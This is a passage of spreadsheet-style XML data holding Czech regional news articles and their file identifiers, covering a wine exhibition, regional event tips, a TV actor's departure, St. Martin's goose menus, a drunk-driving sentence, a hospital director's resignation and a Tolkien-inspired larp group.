    <t>V Hustopečích lidé ochutnají exkluzivní vína z celého světa Hustopeče V sobotu 23. listopadu od 10.00 hodin se v Hustopečích uskuteční další, už 14. ročník unikátní výstavy Světový duel vín. Exkluzivní vína světa a vybraná vína z domácí produkce se i letos utkají v pomyslném duelu. Vítěze si ovšem každý určí sám. Akci, která se stala vyhledávanou mezi odborníky, vinaři i laickou veřejností pro její originalitu, budou i tentokrát hostit krásné prostory Hotelu Amande. Výjimečnou akci nejen na Hustopečsku , ale v celé České republice , založil v roce 2008 hustopečský vinař a majitel prestižního butikového vinařství Miroslav Hrabal. Ten spolu s kolegy pravidelně objíždí proslulé vinařské oblasti po celém světě a díky svým bohatým kontaktům a zkušenostem k nám přiváží vína , ke kterým se běžný člověk jen tak nedostane. „Letos by mělo být největším lákadlem burgundské Chardonnay a samozřejmě také Pinoty. Těšit se ale můžete také na méně známé odrůdy, jako je Meursault, Chambertin, Chambolle, Pommard, Montrachet a Chablis. A mnohé jistě potěší tradičnější odrůdy z různých států světa, kterými jsou Ryzlinky, Sauvignony, Merloty nebo třeba Cabernety,“ pozval na akci za pořadatele Miroslav Hrabal. (red)</t>
  </si>
  <si>
    <t>20241101_538_3241753282_6b764eb3243da8a8730d.html</t>
  </si>
  <si>
    <t>6b764eb3243da8a8730d</t>
  </si>
  <si>
    <t>DALŠÍ TIPY Z KRAJŮ</t>
  </si>
  <si>
    <t>DALŠÍ TIPY Z KRAJŮ Světla vyprávějí v Pardubicích Zámecké zahrady v centru Pardubic s výhledem na soutok Labe a Chrudimky ožijí 6. listopadu výstavou s názvem Světla vyprávějí, která je určena pro celou rodinu. Uvidíte stovky tisíc LED světelných diod, velké světelné sochy, kilometry světelných řetězů a dekorací. Unikátní expozice z dílny designérů a řemeslníků pod hlavičkou společnosti DECOLED vás vtáhne do pohádkového světa statisíců světel. Festival Blues Alive 2024 v Šumperku Mezinárodní hudební festival Blues Alive je zaměřen na blues a příbuzné žánry. Proběhne od 14. do 16. listopadu již tradičně v šumperském Domě kultury. Vstupné 2500 Kč. Hlavní hvězdou bude kytarista a zpěvák Devon Allman se svojí kapelou. Letos přibyla na program i dvě uskupení, reprezentující chicagské blues a místní slavný festival – Chicago Blues Festival feat: Stephen Hull &amp;amp; Dave Herrero &amp;amp; Sheryl Youngblood a také Legends of Chicago Blues feat: Oscar Wilson, Jimi Primetime Smith &amp;amp; Bob Corritore. Na koncertu by měla oslavit své osmdesátiny také zpěvačka Jana Koubková . Svatomartinský přípitek v Lednicko-valtickém areálu Tradiční slavnost na počest svatého Martina se uskuteční 9. listopadu v sále v zámeckých jízdáren v Lednici. Žehnání vína a slavnostní přípitek proběhne v 10 hodin, k poslechu zahraje cimbálová muzika. Na akci bude možno ochutnat svatomartinskou husu a mnoho dalších gastronomických specialit. Zimní prohlídky na Zelené hoře Kostel sv. Jana Nepomuckého na Zelené hoře ve Žďáru nad Sázavou je národní kulturní památkou , zapsanou na Seznamu světového dědictví UNESCO. Byl postaven na začátku 20. let 18. století a je nejosobitějším dílem J. B. Santiniho Aichla . Také v měsících listopadu a prosinci je pro návštěvníky Zelené hory připravena komentovaná prohlídka interiéru kostela. Provádí se vždy v úterý a ve čtvrtek v 10, 12, 14 hodin. Cena je jednotná, 150 Kč za osobu. Snímky: Deník/archiv a Shutterstock</t>
  </si>
  <si>
    <t>321120</t>
  </si>
  <si>
    <t>20241101_539_3241676494_ee2bb0e2cb656126b188.html</t>
  </si>
  <si>
    <t>ee2bb0e2cb656126b188</t>
  </si>
  <si>
    <t>Tipy Deníku</t>
  </si>
  <si>
    <t>Tipy Deníku FMX Gladiator Games 2024 Za svou historii si hry vydobyly pověst jedné z nejlepších světových akcí. Už 14. 12. v O2 areně vidíte show gladiátorů plnou ohňů, nebezpečných triků a skoků. Vstupné 690–1990 Kč. Jaroslav Dušek : Buď zdráv Povídání na otevřené téma, které vyplyne samo ze situace, života a z toho, co přinesou diváci. Hudbou doprovodí Patrik Kee. Uvidíte v Prostějovském divadle 2. 11. Vstupné 490 Kč. Leoš Mareš vystoupí v O2 areně Leoš Mareš uvede 31. 1. a 1. 2. 2025 sám sebe v originální a okázalé show, s níž se poté, co vyprodal letos sály po celém Česku, představí v naší největší hale. Vstupné 990–2990 Kč. Dire Straits Legacy World Tour Legendy britského rocku Dire Straits prodaly celosvětově přes 120 milionů alb. Své turné uskuteční 14. 2. 2025 v Kongresovém sále Praha a 15. 2. 2025 v Bobyhall Brno. Vstupné 1090–1990 Kč. Moto Gala Night show Legendy motorismu se sejdou 16. 11. v Clarion Congress Hotel v Praze , aby si převzaly ocenění, oslavily své úspěchy a uctily památku svých kolegů a předchůdců. Vstupné 899–1199 Kč. Norský Wardruna World Tour Projekt vzešel z metalové scény v roce 2003 a věnuje se ztvárnění starověkých severských tradic v kontextu současné doby. Uvidíte 21. listopadu ve Foru Karlín . Vstupné 1490–1890 Kč. KARLOVARSKÝ KRAJ Labutí jezero v divadle Kdy: sobota 2. listopadu od 19.30 hodin Kde: Karlovy Vary , městské divadlo Za kolik: od 300 korun Proč přijít: Jeden z nejslavnějších a nejznámějších klasických baletních titulů s hudbou vrcholného hudebního romantismu. V Ostrově se hraje pro děti Kdy: neděle 3. listopadu od 15 hodin Kde: Ostrov, Stará radnice Za kolik: 70 korun Proč přijít: Divadelní pohádka vhodná pro děti do 8 let. Veselý výlet do hmyzí říše za dobrodružstvím známé pohádkové postavičky podle stejnojmenné knížky Ondřeje Sekory . STŘEDOČESKÝ KRAJ Velká cena Berouna : XXVI. ročník taneční soutěže Kdy: sobota 2. listopadu od 8.30 do 20 hodin Kde: KD Plzeňka, Beroun Za kolik: 150 korun, děti do 6 let a ZTP zdarma Proč přijít: V kulturním domě Plzeňka se bude konat celorepubliková soutěž v tanečním sportu – standardní a latinskoamerické tance ve věkových kategoriích děti, junioři a dospělí. Charitativní hudební festival pro obec Hynčice Kdy: v sobotu 2. listopadu od 14 hodin Kde: Kino Sokol , Kladno Za kolik: 250 korun Proč přijít: Přijďte na Charitativní hudební festival a přispějte na povodní poničenou obec Hynčice . K tanci a poslechu zahrají kapely Kudy Kam, Hluchavky, Dobrý Struny, Fr. Nedvěd ml., Kupa a Gladly S.W. a zatančí Zářící ženy. Všichni se podílejí na festivalu bez nároku na honorář. ÚSTECKÝ KRAJ Strašidelná procházka v Budyni Kdy: sobota 2. listopadu od 17 hodin Kde: vodní hrad Budyně nad Ohří Za kolik: vstupné dobrovolné Proč přijít: Na hradě v Budyni se chystá strašidelná procházka pro rodiče s dětmi. Na cestě budou připraveny úkoly a krátké scénky. Účastníci si musí v předstihu rezervovat čas procházky, učinit tak mohou na čísle 603 485 388 nebo osobně v budyňském infocentru. Lenka Dusilová v Děčíně Kdy: pátek 1. listopadu od 22 hodin Kde: Hudební klub Le Garage Noir, Děčín Za kolik: 300/350 korun Proč přijít: Stálice české klubové scény Lenka Dusilová míří do Děčína . Její sólové koncerty jsou známé pro svoji neopakovatelnost, která je tvořena částečně samotnou interpretkou. JIHOČESKÝ KRAJ Monstera, prodejní výstava květin Kdy: neděle 3. listopadu od 9 do 12 hodin Kde: budějovický DK Metropol Proč přijít: Poslední prodejní výstava pokojových květin v tomto roce. Pokud hledáte pokojovku, exotickou liánu, vzácnou formu monstery k doplnění vaší sbírky nebo pokud se potřebujete zbavit svých výpěstků – jste na správném místě. První zámecký ples s Jiřím Kornem Kdy: sobota 2. listopadu od 19 hodin Kde: Zámecká jízdárna v Českém Krumlově Proč přijít: Přijďte oslavit 280 let zámecké jízdárny. Těšit se můžete opět na lákavý program, hvězdné obsazení účinkujících či výjimečné kulisy interiéru i exteriéru. Vystoupí Jiří Korn &amp;amp; company , zahraje Metroklub Big Band. LIBERECKÝ KRAJ Halloween v Babylonu Kdy: do soboty 2. listopadu Kde: Centrum Babylon Liberec Za kolik: vstup zdarma Proč přijít: Liberecké zábavní Centrum Babylon si připravilo na letošní podzimní prázdniny zajímavý halloweenský program. Po celý týden od 26. 10. do 2. 11. hrůzostrašně ozvláštní Labyrint, nabídne ve 4D kině zdarma film Strašidelný dům a zakončením bude příšerně zábavná Halloween party s DanceMissionCZ. Od Dušiček k Lucii Kdy: sobota 2. listopadu od 9 hodin Kde: Vodní hrad Lipý Česká Lípa Za kolik: 50 korun Proč přijít: Projděte se tajemným sklepením českolipského Vodního hradu Lipý . Jednotlivá zastavení se budou věnovat listopadovým svátkům, tradicím a zvyklostem od Dušiček až po svátek svaté Lucie . PLZEŇSKÝ KRAJ V zoo se bude strašit Kdy: sobota 2. listopadu od 9 do 20 hodin Kde: Plzeň Za kolik: dle ceníku zoo Proč přijít: Plzeňská zoologická zahrada bude opět plná strašidel při speciálním programu Zoostrašení aneb Bu-bu-zoo. Co vzít s sebou? Strašidelný kostým, který není podmínkou, a na večerní průvod lampion a svíčku na baterky. Největší hity kapely Lucie Kdy: pátek 1. listopadu od 19 hodin Kde: Velký sál MKS Domažlice Za kolik: 250 Kč předprodej, 280 Kč na místě Proč přijít: Úspěšná plzeňská skupina Lucie Revival míří do Domažlic , kde v pátek vystoupí s největšími hity jedné z nejznámějších českých kapel. PRAHA Dream Theater : Výroční koncert Kdy: sobota 2. listopadu od 18.30 hodin Kde: Sportovní hala Fortuna , Za Elektrárnou, Praha 7 Za kolik: vstupné od 1490 Kč Proč přijít: Legendární Dream Theater oslavují 40 let a také návrat spoluzakladatele a bubeníka Mika Portnoye . „Toto turné bude pro nás všechny neuvěřitelně výjimečné! Každý koncert bude plný očekávání a nejrůznějších emocí,“ uvádí kapela k probíhajícímu turné. Vepřobraní na náplavce Kdy: sobota 2. listopadu 10–18 hodin Kde: Smíchovská náplavka, Praha Proč přijít: Vepřové hody slibují zabíjačkové speciality, jitrnice, jelita, prejt, tlačenka, prdelačka nebo ovar. A také dobroty z udíren jako klobásy, špeky, uzené šunky a pečené pochoutky. Na rožni se budou točit selátka a sladkou tečkou budou kynuté buchty a koláče. DALŠÍ TIPY Z KRAJŮ Magická esa Velké „copperfieldovské“ iluze v podání mistra světa ze Světového poháru bavičů, iluzionisty Pavla Kožíška . Uvidíte 16. listopadu v Divadle kouzel Pavla Kožíška v Líbeznici. Těšit se můžete na čtyřmetrovou skluzavku času, která promění dospělého člověka v malé dítě, záhadné čtení myšlenek divákům, nebezpečné prostoupení obřím ventilátorem, vystřelení kouzelnice z děla a na řadu dalších velkolepých iluzí plných perfektní zábavy! Divokej Bill – návrat do klubů Divokej Bill se po 10 letech vrací do klubů na akustické turné a zahajuje své klubové turné. Vstupné je 700 Kč. Skupina slibuje komornější vystoupení. A pokud vše půjde dobře, bude pro vás mít i krátký dokument o své historii, který uvidíte před koncertem. Tento měsíc se na ně můžete těšit 8. 11. ve Vimperku , 9. 11. v Kadani , 15. 11. v Teplicích , 16. 11. ve Vysokém Mýtě , 22. 11. v Plzni , 23. 11. v Brně , 28. 11. v Písku a 30. 11. v Hradci Králové . Můj Smetana – cyklus oper Rok české hudby je v roce 2024 výjimečný tím, že v něm slavíme 200 let od narození velikána české hudby Bedřicha Smetany . Divadlo J. K. Tyla v Plzni proto uvádí cyklus Smetanových oper, neboť opera patří k hlavním pilířům Smetanova skladatelského díla. Letos se ještě můžete těšit 8. 11. na Hubičku, 10. 11. na Čertovu stěnu, 6. 12. na Dalibora a 7. 12. na Čertovu stěnu. Příští rok ještě divadlo uvede 4. 1. Branibory v Čechách , 5. 1. Tajemství a 6. 1. Dvě vdovy. Svatomartinské hodování v Českém Krumlově V pondělí 11. 11. podle tradice přijíždí Martin na bílém koni a přiváží nejen první sníh, ale také první víno roku. Svatomartinské menu a další speciality můžete v Českém Krumlově ochutnat již o pár dní dříve. Už 8. 11. začíná Svatomartinské hodování a místní restaurace nabídnou nejen svatomartinské víno a husu. Pochutnat si můžete na flambovaných husích játrech na koňaku, husí paštice se sušenými švestkami, husím kaldounu s játrovými knedlíčky a nudlemi a dalších dobrotách.</t>
  </si>
  <si>
    <t>20241101_54_3264529795_7a3139a7486d7aa5c392.html</t>
  </si>
  <si>
    <t>7a3139a7486d7aa5c392</t>
  </si>
  <si>
    <t>Těžká rána pro diváky Ulice! Oblíbená postava končí. Henry poslední klapku oplakal</t>
  </si>
  <si>
    <t>Těžká rána pro diváky Ulice! Oblíbená postava končí. Henry poslední klapku oplakal V Ulici strávil celých 20 let, nyní se ale definitivně loučí. Představitel dobráka Henryho Rettiga Daniel Brown končí v oblíbeném nováckém seriálu. "Bylo to velmi krásné, ale smutné loučení. Byli jsme jako rodina," svěřil se v rozhovoru pro eXtra.cz herec, jehož odchod oplakala řada diváků. Když Daniel Brown coby Henry Rettig začínal natáčet Ulici , býval podle svých slov nervózní. V seriálové hospodě, která po něm nese jeho jméno, nakonec strávil dlouhých dvacet let. Nyní se ale Henry musí vrátit do Ameriky , jelikož jeho tatínek prodělal vážnou operaci srdce a nemá už dostatek sil na to, aby se o rodinný ranč staral sám. Seriál Ulice Překvapivá slova hvězdy Ulice. Hrušínská si roli gamblerky užívá, reakce lidí ji zaskočily Dan Brown konec Henryho oplakal Posledního natáčecího dne Dana Browna se symbolicky zúčastnila také jeho seriálová partnerka Ivana v podání Vilmy Cibulkové , která se v seriálu objevila po dlouhých 10 letech, a to na 2 natáčecí dny. Herec kanadského původu zažil velmi emotivní loučení před kamerami, kdy natočil a následně vypil poslední pivo za potlesku všech blízkých přátel. Ke konci emotivního natáčení mu také ukápla slza. "Henry se sice měl rozplakat, ale brečel jsem i jako Dan. Nebylo to tedy hrané, nýbrž skutečné," odhalil sympatický herec během rozhovoru pro eXtra.cz, na jehož hlase bylo znát, že pro něj Ulice znamenala mnohem víc než jen práce. Příspěvek sdílený Ulice (@uliceserial) Rozhovor s Hrušínským: Smutní také fanoušci Ulice "Přeji panu Brownovi , který dlouhých 20 let představoval našeho Henryho, aby se mu v dalších letech dařilo. Jak pracovně, tak osobně. Bude v Ulici hodně chybět, " posteskl si na Instagramu divák Jiří. " Bude nám chybět, Henry je srdcovka," přidala se další divačka. " Bude chybět. Sympaťák, nekonfliktní, pohodář. Víc takových lidiček by to chtělo a nejen v seriálu. Sice malá role, ale nikdo nikdy na něj nenadával, teda na tu jeho postavu. Víc takových lidiček i v životě. Díky, Henry. A budete chybět, pane Brown ," vzkázal herci další zklamaný divák. Na momenty z posledního natáčení se podívejte v naší fotogalerii. Luděk Staněk poodhalil zákulisí Zrádců: Bylo to jako ve vězení a strašně na bednu Autor: Šárka Peková Autor person Šárka Peková</t>
  </si>
  <si>
    <t>20241101_540_3241016384_058c7c4f9e7d34a55c9d.html</t>
  </si>
  <si>
    <t>058c7c4f9e7d34a55c9d</t>
  </si>
  <si>
    <t>Novák obklopí záře. Připraví ale Příbram o dvě akce</t>
  </si>
  <si>
    <t>Novák obklopí záře. Připraví ale Příbram o dvě akce Příbram Areál Nového rybníka bude ještě před adventním časem zářit každý den od soumraku až do večera tisíci světel. Příbram je jedním ze sedmi českých měst, která letos zažijí světelný vodní svět. Zážitek to bude nádherný, zároveň ale i poměrně nákladný. Světelné sochy a dekorace rozsvítí příbramský areál Nový rybník poprvé už den po Dušičkách, naposledy pak až v příštím roce, týden po Třech králích. Zářit tam budou například velké labutě, vážky, žáby, ryby a slavíci, ale i lekníny nebo vrby, světla se přitom budou odrážet na vodní hladině. Na procházce kolem rybníka pak bude návštěvníky při té podívané provázet i hudba. Areál bude od 2. listopadu až do 12. ledna následujícího roku přístupný mezi šestou a čtrnáctou hodinou zdarma, pak bude dvě hodiny zavřen a v 16 hodin se otevře expozice Světla vyprávějí, která zhasne s devátou hodinou večerní. Za pětačtyřicetiminutovou prohlídku zaplatí dospělý na místě 245 korun, snížené vstupné je za 170 korun. Stáhnout trochu náklady lze online pořízením vstupenek i rodinným vstupným. Zdarma smí do areálu na výstavu pouze děti do dvou let věku. Děti se mohou v době otevření expozice vozit na dřevěném kolotoči, tam stojí lístek padesátikorunu. Návštěvníci mohou dle libosti na světelné výstavě fotit a natáčet, jen drony jsou zakázány. A do areálu mají také zapovězen vstup psi. „Upozorňujeme, že z důvodu konání této akce letos neproběhnou tradiční akce Svatomartinská vína na Nováku a Čertovský Novák,“ oznámil pořadatel na sociální síti.. (spi)</t>
  </si>
  <si>
    <t>20241101_541_3241016374_e0351fc0258f67a652da.html</t>
  </si>
  <si>
    <t>e0351fc0258f67a652da</t>
  </si>
  <si>
    <t>Svatomartinské husy si zarezervujte včas. Na menu už je někde obsazeno</t>
  </si>
  <si>
    <t>Svatomartinské husy si zarezervujte včas. Na menu už je někde obsazeno Svatomartinskou husu si i letos můžete vychutnat doma či v restauraci s tradičními nebo i netradičními přílohami. A k tomu nesmíme zapomenout na přípitek svatomartinským vínem . Deník připravil přehled menu a cen. Jana Hájíčková Berounsko Kdo by si rád dopřál svatomartinskou husu, musí si pospíšit. Někde je možné si ji objednat jen do konce října. A některým restauracím už se plní rezervační systém, někde už je dokonce obsazeno. Šťastná koza na Husově náměstí nabízí husy do konce října. Je možné si je zde objednat pouze osobně a složit zálohu 500 korun. K vyzvednutí pak budou 6. listopadu. „Husy stojí 430 korun za kilo, přičemž mají okolo 4 kilogramů. Jsou z farmy Bojanovice ,“ vysvětlila prodavačka. Zeman Maso a Uzeniny v Hořovicích přijímá objednávky do 4. listopadu. Husy budou k vyzvednutí na prodejně 7. listopadu. Kilogram vyjde na 189 korun, přičemž husy mají okolo 4 kg. Ještě do 3. listopadu probíhá akce na husy v prodejnách Lidl . V nabídce je husa mražená, kilogram za 150 korun. Váha husy se pohybuje okolo 4,2 kg a je s droby. KDE JSOU JEŠTĚ VOLNÁ MÍSTA? Na husu je ale možné si vyrazit i do restaurace. U Aleny na Husově náměstí v Berouně už přijímají rezervace. „Začínáme obědy v pátek 8. listopadu a budeme svatomartinské husy nabízet do vyprodání,“ řekl majitel restaurace Pavel Suchopár. Podle něho už mají na pátek 8. listopadu a sobotu 9. listopadu k večeři z osmdesáti procent obsazeno, nicméně k obědu ještě volná místa jsou. „Rovněž nabízíme upečenou husu s sebou domů. Je ale nutné si ji předem objednat,“ upozornila servírka. Restaurace si připravila speciální svatomartinské menu. Zákazníci mohou ochutnat husí paštiku s červeným vínem a brusinkami za 145 korun, husí játra na cibulce a bílém víně za 145 korun, husí kaldoun s žemlovými knedlíčky a husím masem za 79 korun, pečenou husu (¼, tedy 900 g) s houskovým a špekovým knedlíkem, bramborovým lokšem, bílým zelí s jablky a červeným zelím s rozinkami za 345 korun, trhané husí maso s bramborovými lokšemi s bílým zelí s jablky a červeným zelím s rozinkami za 310 korun. A nechybí svatomartinské víno z vinařství Vajbar, které stojí 0,7 l 210 korun nebo 0,1 l pak 35 korun. V restauraci Beroun Golf Club je možné si telefonicky zarezervovat od pondělí 28. října do středy 6. listopadu svatomartinskou husu. Hody se zde budou konat od 8. do 10. listopadu od 11 do 18 hodin. „Upečenou svatomartinskou husu je možné si odnést domů nebo sníst v restauraci. Bude se podávat se dvěma druhy knedlíků, bílým a červeným zelí,“ informoval šéfkuchař Jiří Kočí . Za celou chtějí 1600 korun, čtvrtka přijde na 450 korun. Přestože husí hody v restauraci U Krobiána v Berouně Hostimi se konají od 2. listopadu do 8. prosince, už jsou plně obsazené. Mají zde nachystáno 500 porcí hus. „Pokud by měl někdo zájem si je rezervovat na příští rok, pak doporučuji během září,“ uvedl majitel restaurace Jan Zykán. Svatomartinskou nabídku zde bude tvořit: játrová paštika s praženými mandlemi, brusinkami, zeleným pepřem a čerstvou bagetkou za 145 korun, husí kaldoun s kousky masa, julienne zeleninou a nudlemi za 95 korun, farmářská husa z českého chovu (porce 650g), knedlík z domácích brambor a karlovarský knedlík, bílé zelí a povidlové červené zelí s červeným vínem za 535 korun, závin z domácího listového těsta, s jablky, ořechy a šlehačkou za 95 korun. „Zvýhodněná cena za kompletní menu je 800 korun,“ dodal Zykán. Svatomartiská husa. Patří ke každoročním tradičním pochoutkám na svátek Svatého Martina 11. listopadu. Foto: Deník/ Miroslav Rada Ještě do 3. listopadu můžete zakoupit husu v prodejnách Lidl . V nabídce je husa mražená, kilogram za 150 korun. Její váha se pohybuje okolo 4,2 kg a je s droby.</t>
  </si>
  <si>
    <t>20241101_542_3241003605_d0dfbf7ce62fa34b2123.html</t>
  </si>
  <si>
    <t>d0dfbf7ce62fa34b2123</t>
  </si>
  <si>
    <t>Za řízení pod vlivem alkoholu a se zákazem půjde muž do vězení</t>
  </si>
  <si>
    <t>Za řízení pod vlivem alkoholu a se zákazem půjde muž do vězení Ostrava Na devět měsíců poslal v úterý 29. listopadu Okresní soud v Ostravě do vězení padesátiletého muže, kterého policisté přistihli počátkem října za volantem opilého a navíc s vysloveným zákazem řízení. Nepodmíněný trest souvisí s tím, že za poslední rok takových zločinů spáchal hned deset. V minulosti byl už za řízení pod vlivem alkoholu a maření výkonu úředního rozhodnutí třikrát odsouzen. Vždy dostal podmínku nebo trest veřejně prospěšných prací. „Nelze donekonečna udělovat alternativní tresty, když tyto evidentně nevedou k nápravě,“ zdůvodnil státní zástupce skutečnost, že pro souzeného požaduje pobyt ve vězení. Recidivista s ním nakonec souhlasil. Přiznal vinu a trest přijal. Kromě pobytu ve vězení jej čeká i zákaz činnosti. Za volant by invalidní důchodce z Ostravy neměl usednout osm let. Tentokrát mu soud řízení zakázal na dva roky. Předchozí tresty se k tomu přičtou. Další případ, kdy pod vlivem alkoholu dokonce i havaroval, bude v nejbližší době řešit Okresní soud v Opavě . „Tresty zákazu činnosti se sčítají. Neběží souběžně vedle sebe,“ vysvětlil žalobce. Soud muži navíc zabavil i vůz, který řídil. Za poslední rok jde už o třetí zabavený automobil. Další rozbil při dopravní nehodě. Muž je podle policie v podobných případech rekordmanem. „Kromě něj nemáme nikoho, kdo by desetkrát během jednoho roku porušil zákaz řízení a byl při tom přistižen. Navíc často pod vlivem alkoholu ,“ uvedla mluvčí ostravské policie Eva Michalíková. První porušení soudního zákazu policisté podle ní evidovali loni v září a poslední na počátku letošního října. A právě za tento poslední případ muž stanul před soudem. Policisté jej kontrolovali v Martinově. V krvi měl okolo dvou promile alkoholu . (čtk) Foto: ČTK</t>
  </si>
  <si>
    <t>45750</t>
  </si>
  <si>
    <t>20241101_543_3241001343_63923f48c1b886cea123.html</t>
  </si>
  <si>
    <t>63923f48c1b886cea123</t>
  </si>
  <si>
    <t>Ředitelka Rehabilitačního ústavu Hrabyně skončila. Podřízení ji vinili z šikany</t>
  </si>
  <si>
    <t>Ředitelka Rehabilitačního ústavu Hrabyně skončila. Podřízení ji vinili z šikany V Rehabilitačním ústavu Hrabyně podalo rezignaci všech třináct lékařů, spolu s dalšími zaměstnanci si stěžovali na dlouhodobou šikanu ze strany ředitelky Andrey Ruprichové. Ta po úterním setkání s ministrem zdravotnictví na svou funkci rezignovala. Stáhnou lékaři výpovědi? Petr Jiříček Ostrava Omezování pravomocí, bossing čili šikana zaměstnanců, chaotické řízení a údajně, jak Deníku doložilo nezávisle na sobě několik pracovníků centra, i výkon funkce pod vlivem alkoholu . Na základě těchto důvodů v minulém týdnu podalo v Rehabilitačním centru Hrabyně hromadně výpověď všech třináct lékařů. Na základě toho se za přítomnosti ministra zdravotnictví Vlastimila Válka uskutečnilo na ministerstvu jednání o další budoucnosti RÚH. Co se na ní dělo, zůstalo za zavřenými dveřmi, oficiálním výsledkem je nicméně rezignace ředitelky Andrey Ruprichové. „Byla dotazována na možnosti dalšího řešení současného stavu. Vzhledem k tomu, že se paní ředitelce nepodařilo přesvědčit o své vizi fungování RÚH klíčové zaměstnance, rozhodla se podat k dnešnímu dni rezignaci na funkci ředitelky ústavu,“ řekl ČTK mluvčí ministerstva zdravotnictví Ondřej Jakob . Deník Andreu Ruprichovou kontaktoval na telefonu, ale neúspěšně. Ještě v pátek přitom jakékoli pochybení odmítala. „Nevidím důvod pro své odvolání a své postupy a rozhodnutí jsem připravena v případě potřeby vysvětlit i zřizovateli RÚH, kterým je ministerstvo zdravotnictví,“ řekla Deníku a své oponenty se snažila utišit zmínkou o možné právní dohře. LÉKAŘI SE ZŘEJMĚ VRÁTÍ DO PRÁCE Než bude jmenován nový ředitel, vedením RÚH byl dočasně pověřen ředitel Fakultní nemocnice Ostrava Jiří Havrlant . S touto změnou se dá očekávat i změna postoje lékařů. „Budeme o tom samozřejmě jednat. Výpověď byla podána, je to oficiální dokument, ale samozřejmě hlavní překážka nebo spíše podmínka byla splněna,“ řekla Deníku primářka Ilona Nedvědová v narážce na rezignaci ředitelky. „Chci se vrátit do práce. Jako lékaři určitě budeme postupovat jednotně, pokud se vrátíme do práce, tak všichni,“ uvedla Nedvědová. S ohledem na důvody, které k tomu vedly, a kontinuální zajištění péče pro pacienty lze očekávat, že přijetí stažení podaných výpovědí bude pro dočasného ředitele spíše formalita. Rehabilitační ústav Hrabyně poskytuje specializovanou péči klientům po úrazech, cévních mozkových příhodách nebo s onemocněním pohybového ústrojí či nervového aparátu. Skládá se ze dvou areálů. První se nachází v Hrabyni a specializuje se na dospělé pacienty s neurologickými a poúrazovými stavy. Druhou částí je detašované pracoviště v Chuchelné zaměřené mimo ortopedických a neurologických diagnóz i na pacienty po amputacích. Rehabilitační ústav Hrabyně . Ústav poskytuje péči klientům po úrazech, cévních mozkových příhodách, s onemocněním pohybového ústrojí či nervového aparátu. Foto: Deník/Veronika Schindlerová</t>
  </si>
  <si>
    <t>13760</t>
  </si>
  <si>
    <t>20241101_544_3241718513_8e92b17fbf2ea4b4999b.html</t>
  </si>
  <si>
    <t>8e92b17fbf2ea4b4999b</t>
  </si>
  <si>
    <t>Klan Horských kladiv v akci. Liberecký lesopark se mění v bojiště</t>
  </si>
  <si>
    <t>Klan Horských kladiv v akci. Liberecký lesopark se mění v bojiště Liberec – Spisovatel a univerzitní profesor John Ronald Reuel Tolkien patří mezi nejvýznamnější představitele fantasy žánru. V knize Silmarillion představil fiktivní svět Arda , jehož součástí je kontinent Středozem, kde se odehrává většina Tolkienových příběhů. A právě tento svět inspiroval vznik klanu Horských kladiv, jehož tréninky probíhají každou lichou sobotu v lesoparku v libereckých Ruprechticích. Skupina jako taková je aktivní už několik let a řada členů se věnuje rolovým hrám nebo-li larpům dlouhodobě. Vede ji kapitán Grim a dva seržanti. Aktuálně Širokoramenatí čítají osm hlavních členů, kteří tvoří jádro skupiny. Během pravidelných tréninků se zaměřují na nacvičování formací, šermu, soubojům, duelům a pilování fyzické kondice. „Zrod skupiny byl popravdě velmi neplánovaný. Osobně jsem nikdy skupiny zakládat nechtěl a ze začátku jsem jen hledal pár lidí na společné tréninky. Člověk, který se mnou začal trénovat, byl mým projektem na kostým velice nadšen a nakonec mě přemluvil, abych založil vlastní skupinu,“ popsal začátky zakladatel klanu a velitel klanu Tomáš Jančář, který v civilu pracuje jako řidič kamionu. pokračování na straně 3 pokračování ze strany 1 Jak sám zdůraznil, tréninky jsou otevřené všem rasám a mohou se jich účastnit zájemci z široké veřejnosti. „Myslím si, že se vyznačujeme přátelským kolektivem, kde si vzájemně snažíme pomáhat a rovněž i zaměřením skupiny,“ doplnil s tím, že znázorňují rasu trpaslíků a jako asi jediní v republice rod Broadbeams. Na trénink poslední říjnovou sobotu dorazil 23letý Karel Majer, kterého fantasy bavilo odmala. Kromě knih od J. R. R. Tolkiena přečetl například ságu o Eragonovi a aktuálně louská Zaklínače. „Když jsme zjistil, že takový koníček existuje, řekl jsem si, že to chci taky vyzkoušet. Vrací mi to hezký pocit z dětských let,“ svěřil se Deníku mladý muž s tím, že ve skupině už je přibližně rok. Na trénink dorazil autobusem už v plné polní. „Mám na sobě tematické oblečení jako klasickou tuniku, kalhoty, rukavice, prošívanici a nechybí ani helma, meč a štít.“ Třicetiletý Kryštof Fanta hledal skupinu, se kterou by mohl šermovat a přes kamaráda se dostal do klanu Horských kladiv. Jeho aktivita ho natolik zaujala, že se k němu připojil a zastává roli kopiníka. Některé části kostýmu si dokonce sám ušil. „Fantasy mám rád, začínal jsem u filmů a posléze i ke knihám. Aktuálně se chystám přečíst Silmarillion, abych pronikl ještě hlouběji do tohoto světa,“ podotkl Fanta. Kromě pravidelných tréninků jezdí Širokoramenatí na několik bitev za rok a k tomu nějaké dětské akce. Úzce spolupracují s některými řemeslníky v Libereckém kraji ohledně vybavení, případně někteří z nich si sami troufnou na úpravy či opravy. „V boji se k ostatním rasám chováme podle toho, jaké mají mezi sebou vztahy v knihách. U ohně a piva jsme pak většinou všichni jedna parta podobně smýšlejících nadšenců a rasové rozdíly se již nijak neřeší a když, tak spíše z humoru,“ dodal Tomáš Jančář. TRÉNINK klanu Horských kladiv v libereckých Ruprechticích . Foto: Deník/Martin Štefanov Autor: JIŘÍ LOUDA Autor Jiří Louda</t>
  </si>
  <si>
    <t>15460</t>
  </si>
  <si>
    <t>20241101_545_3241718511_7d62070a0633b566ca8c.html</t>
  </si>
  <si>
    <t>7d62070a0633b566ca8c</t>
  </si>
  <si>
    <t>Tipy Deníku – Liberecko</t>
  </si>
  <si>
